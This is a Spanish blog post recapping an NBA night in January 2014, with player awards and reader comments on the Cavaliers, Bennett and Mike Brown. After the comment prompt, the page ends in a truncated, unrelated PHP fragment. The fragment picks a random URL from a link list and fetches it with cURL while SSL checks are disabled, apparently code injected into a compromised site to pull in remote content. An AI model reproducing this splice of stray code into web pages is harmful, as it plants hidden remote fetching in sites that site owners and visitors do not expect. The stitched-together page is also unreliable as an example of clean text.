La Crónica: Derrotas de Spurs, Blazers y Warriors

29 de January de 2014 por TheDeerHunter

Extraña jornada en el oeste. Los perseguidores ceden hueco ante el líder de la conferencia y por abajo los Grizzlies aprietan de lo lindo aprovechando su mejor momento del año tras recuperar sus señas de identidad defensivas, por cierto. En cambio, los Warriors entran otra vez en una espiral extraña, con la peor proyección de la zona noble en este momento. Pero vayamos por partes.

Es evidente que esta gente nos lee. Ayer hablábamos de Anthony Davis y anoche nos respondió con actuación de MVP en Cleveland, rozando el triple doble con tapones. Bien es cierto que buena parte de ese “capazo de boinas” que regaló eran pedidas a gritos por los atacantes Cavaliers, con un espíritu kamikaze que ni los Lemmings. Resulta sorprendente lo poco trabajado que se le ve a ese equipo. En ataque es imposible jugar más simple: a lo sumo uno o dos pases y a probar suerte. En defensa ni eso. Fiel reflejo de Mike Brown y de Kyrie Irving. Desesperante. Y eso que anoche les tocó la lotería con las sorprendentes actuaciones de Bennett y Tyler Zeller (100-89). A esperar un nuevo pick alto (que quizá malgasten).

Poco después los Pistons se reencontraban con la victoria y con sus opciones para postemporada gracias a Orlando (87-103), pero los Knicks parecen haber despertado definitivamente, derrotando a los Celtics con comodidad y sin necesidad de una actuación monstruosa de Carmelo (88-114). Tanto Knicks como Pistons están a medio partido de los Bobcats en su lucha por la octava plaza. 

Llegamos a las relativas sorpresas de anoche. Los Spurs cayeron en una difícil plaza como es Houston y para colmo Manudo salió de la cancha con una aparente lesión muscular tras un gran mate. Howard “sólo” tuvo que lanzar 25 tiros libres en el “hack” que le volvió a plantear Popovic, pero no estuvo demasiado horrendo. Fueron claves sus rebotes en una velada espesa de los tejanos (90-97). Por su parte los Blazers tropezaban en casa ante un equipo de fuera de playoffs, aunque no era un equipo cualquiera sinó los Grizzlies y anoche, además, les tocó sufrir el, posiblemente, mejor partido de la temporada de los ositos. Apenas hubo color a pesar del partidazo de Aldridge (98-81). La mejor actuación de Marc, muy bien arropado por Zach y Conley. Pintan muy bien últimamente.

Los Warriors decepcionaron en casa ante Wizards. Fue un planteamiento típico de ellos en el Oracle, jugueteando toda la noche con el peligro y sin llegar a resolver hasta los instantes finales. En esto que ocurrió lo inesperado: Wall anotó un triple y después fue capaz de sujetar a Curry en el suyo. Su intento terminó siendo sonrojante, como su balance en los últimos partidos (88-85). Y que jueguen…

Finalmente la historia habitual de los Lakers este curso. Dieron la cara ante un gran equipo como es Indiana pero sin creer realmente en la victoria (104-92). Por cierto, se comentaba si era una de las peores temporadas de la historia de la franquicia. Desde su llegada a L.A. lo es. Sólo en la 1974-75 se bajó del 40% de victorias (un 30-52 .- 36,6%). En Minneapolis sí se firmaron dos campañas inferiores: 25 victorias en la 1959-60 y tan sólo 19 en la 1957-58. Esperemos que no lleguen a tales niveles.

PREMIOS

MVP: Extraordinario Anthony Davis. Hemos hablado de sus 8 tapones y son también habituales sus 7 rebotes pero anoche además estuvo particularmente fino en ataque, con 30 puntos (12-18). Además repartió 3 asistencias, recuperó un balón y no sufrió ninguna pérdida.

Rookie: Victor Oladipo fue el único que gustó en la clara derrota de Orlando en Detroit. Sin embargo, anoche sorprendió (al fin) Anthony Bennett, destapándose con una notable actuación. 15 puntos, con dos triples, 8 rebotes, 1 asistencia y 1 tapón.

Sorpresa: Todo el curso pasando miserias con Bynums y calaña de esa y quizá Brown tenía la solución en casa. Excelente Tyler Zeller que suele cumplir cuando le dan la oportunidad. Anoche 13 puntos, 10 rebotes, 2 asistencias y 1 robo en únicamente 21 minutos.

Decepción: Nos quedamos con David Lee del que hablábamos como posible all-star el otro día. Superado totalmente por Nene. Mención aparte el acierto de los tres primeras espadas de los Warriors. 15 de 50.

Esfuerzo en vano: Que sí, que Davis nos pegó un buen “zas, en toda la boca” pero no se puede olvidar el tipo de gente con el que él se juega las habichuelas para ir al all-star. Lamarcus Aldridge, en un partido “decepcionante” firmó 27 puntos, 16 rebotes, 2 tapones y 2 asistencias. El nivel de corte del 4 del Oeste es el que es.

TOP-10

Comenta

11 comentarios a esta entrada

  1. Vader dice:
    #1

    – Anthony Davis es una bestia que marcara época. Si eligiera un jugador para iniciar una franquicia seria Durant y luego él…

    – Con la lesión de Bargiani los Knicks vuelven a jugar con Melo de 4 y recuperandonsensaciones del año pasado. Más circulación, más triples, mejor juego. Creo que ha sido un fallo de Wodsoon no jugar small-ball hasta ahora. Podria haber usado al italiano desde la banca para dar anotación a la segunda unidad. Sea como sea fue un fichaje erroneo que no hacia ninguna falta.

    – ¿Cuando van a despedir a Mike Brown? Lo digo muy en serio, con unos buenos asistentes yo seria mejor coach que él… Es que es muy malo…

    Saludos

      Citar

  2. Esteban dice:
    #2

    buen partido de Anthony BENNETT, los cavs deberian aprovechar ese envion de confianza y mandarlo al quinteto titular, el chaval aun puede mostrar algo del potencial que le vieron para elegirlo, pero si pasa todos los partidos sentado en la banca, dificilmente tenga un estado de animo bueno

      Citar

  3. Ruxixon dice:
    #3

    Por fin he visto un partido entero de Memphis y tuve la suerte de pillarle en el mejor,jeje.Lo de esta noche siguió el abc de los Grizzlies de los últimos años,con el añadido de la intensidad de sus jugadores suplentes -exceptuando a Ed Davis al que no le veo nada de lo que prometía-.Mención especial a James Johnson,parece otro jugador totalmente distinto.Siendo fichado desde la D-League,me pregunto si Portland no podrá rescatar a nadie allí para meterlo en la rotación,sobre todo en las posiciones 3-4,porque van cortos de banquillo con la nulidad de D.Wright y la escasa experiencia de T.Robinson.

      Citar

  4. TheDeerHunter dice:
    #4

    Esteban:
    buen partido de Anthony BENNETT, los cavs deberian aprovechar ese envion de confianza y mandarlo al quinteto titular, el chaval aun puede mostrar algo del potencial que le vieron para elegirlo, pero si pasa todos los partidos sentado en la banca, dificilmente tenga un estado de animo bueno

    Tristan Thompson me parece de lo más honesto que queda ahora mismo en ese quinteto. Meter a Bennett sería como señalarle a él por los malos resultados.
    Antes pediría otras cabezas… la primera supongo que casi todo el mundo estaríamos de acuerdo de quién sería.

      Citar

  5. Denise dice:
    #5

    Muy bien Oladipo últimamente,, en los últimos 5 partidos, sus medias son de 17 puntos, 6,5 rebotes, 4,5 asistencias, 2 robos de balón y un ya decente casi 47% en tiros de campo frente al 41% que lleva en el acumulado de la temporada. Su manejo de bola también ha mejorado, y a pesar de las 6 pérdidas de anoche, cada vez pierde menos el balón.
    No puedo decir lo mismo de Big Baby Davis, siempre he sido un seguidor y defensor suyo, pero su temporada está siendo muy mala y Orlando debe traspasarlo antes del Deadline por cualquier cosa que permita ahorrar dinero, cualquier expiring me vale.
    Y Harris me gusta mucho más cuando juega de falso 4 que de 3 puro. De falso 4 genera más desequilibrio entre los rivales a la hora de defenderlo y encuentra más espacios. Cuando juega de 3, tiene al alero defensor constantemente pegado a su lado dejandole mucha menos libertad.

      Citar

  6. arivas dice:
    #6

    TheDeerHunter: Tristan Thompson me parece de lo más honesto que queda ahora mismo en ese quinteto. Meter a Bennett sería como señalarle a él por los malos resultados.
    Antes pediría otras cabezas… la primera supongo que casi todo el mundo estaríamos de acuerdo de quién sería.

    Pueden jugar los dos… realmente Brown se ha dignado a darle cancha a Bennett por la lesión de Varejao. En cualquier caso y sea como titular o saliendo desde el banquillo si lo de Varejao se alarga es el momento de Bennett.
    Esta claro que, entro otras cosas, el chico no tenia confianza (sus porcetajes de tiro son pesimos) si puede tener minutos le vendrá fenomenal.

    Yo lo he seguido bastante, y es que realmente no metia una. Es cierto que al principio (que fue cuando mas minutos le dieron) se le veia mal fisicamente, pero ahora ya se le me mejor, ayer hace un mate e intenta otro par de ellos que le paran en falta… y en cuanto al tiro tiene una buena mecánica y presentaba unos % aceptables en su etapa univeritaria, no era normal el atasco que tenía.

      Citar

  7. Denise dice:
    #7

    Yo creo que os estáis flipando bastante con Bennet. Después de más de 40 partidos ha llegado los 15 puntos, y encima la mayoría de ellos han sido en minutos de la basura con el equipo perdiendo de entre 15-20 puntos y con bastantes suplentes de los Pelicans.
    Mejor partido ha hecho Stiemsma con 11-9-2 a estos depriemntes Cavs y nadie le ha dedicado unas lindas palabras al muchacho. 🙂
    En fin, que Bennet me parece un pufo de mucho cuidado y obviamente se ha puesto el listón tan bajo que alguna vez tendrá que jugar mejor de lo que lo está haciendo, pero en definitiva, no creo que nunca se quite la etiqueta de ser uno de los peores (o el peor) número 1 de un Draft.

      Citar

  8. Esteban dice:
    #8

    Denise:

    No puedo decir lo mismo de Big Baby Davis, siempre he sido un seguidor y defensor suyo, pero su temporada está siendo muy mala y Orlando debe traspasarlo antes del Deadline por cualquier cosa que permita ahorrar dinero, cualquier expiring me vale.

    no nos olvidemos que viene de una lesion y de ahi que quiza le este costando arrancar
    sobre el trade, cuando menos nivel demuestre mas dificil sera traspasarlo

      Citar

  9. Esteban dice:
    #9

    TheDeerHunter: Tristan Thompson me parece de lo más honesto que queda ahora mismo en ese quinteto. Meter a Bennett sería como señalarle a él por los malos resultados.
    Antes pediría otras cabezas… la primera supongo que casi todo el mundo estaríamos de acuerdo de quién sería.

    entiendo tu punto desde Thompson, pero el problema esta aqui:

    si tienes a Thompson y fichas a Earl Clark por que elijes a BENNETT??

    Si tienes a Varejao y tienes a Zelller, para que fichas a BYNUM?

    los cavs se han manejado de manera horrenda con sus picks, solo salvados por que Irving, Waiters y Thompson, individualmente son bastante buenos (o Irving all-star), pero han estado lejos de poder armar un equipo y no han sabido que hacer con el espacio libre, fichajes como Bynum, Deng (prestado por un par de meses), Jack, Clark, es tener dinero y no saber que hacer con el

    Mientras que teniendo a Irving, no parecía adecuado fichar a un dos tan bajo como Waiters y tan anotador, hubiese sido preferible un alero de juego completo como Barnes, lo mismo que Thompson, yo me habría quedado con Valanciunas, etc

    las malas movidas de la gerencia, sumadas a lo mal técnico que esta demostrando ser Brown, han dejado a los Cavs en una pésima posición

    lo peor? No son malos, sino que su dueño cree que son buenos y presiona por PO, no creo que haya nada peor que poner expectativas demasiado altas sobre jóvenes que aun no están capacitados, el cartel de fracaso les quedara aunque no lo merezcan

      Citar

  10. rumbero dice:
    #10

    Lo más sangrante del tema Bennett es que fue Mike Brown uno de los máximos responsables para que los Cavs lo acabaran seleccionando. Como puede ser que un tío por el que apuestas, que además es el nº1 del draft, sea el rookie nº24 en minutos jugados? Que Dellavedova que es undrafted ha jugado más que él…
    El chaval empezó horrible, con una pinta de pufo importante, y a partir de aquí el manejo de Brown en sus minutos lo ha acabado de destrozar. Ayer 8 minutos, hoy no juegas y mañana 5 pero cuidado no falles dos tiros que te vas al banquillo. Y todo esto, y como se comenta en la crónica, en el maravilloso y trabajado sistema ofensivo de los Cavs.

      Citar

  11. Esteban dice:
    #11

    yo soy de la opinion que si quieres PO un año y a la vez tienes un pick uno, o lo traspasas o te olvidas de PO

    lo mas probable era que BENNETT necesitara minutos, y que se equivocara muchisimo, pero lo bueno de los equipos con PICK 1 es que no importan las derrotas sino realizar a sus jovenes, bueno no es el caso de los Cavs, que quieren ganar, aunque eso sea desperdiciar a este chaval

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>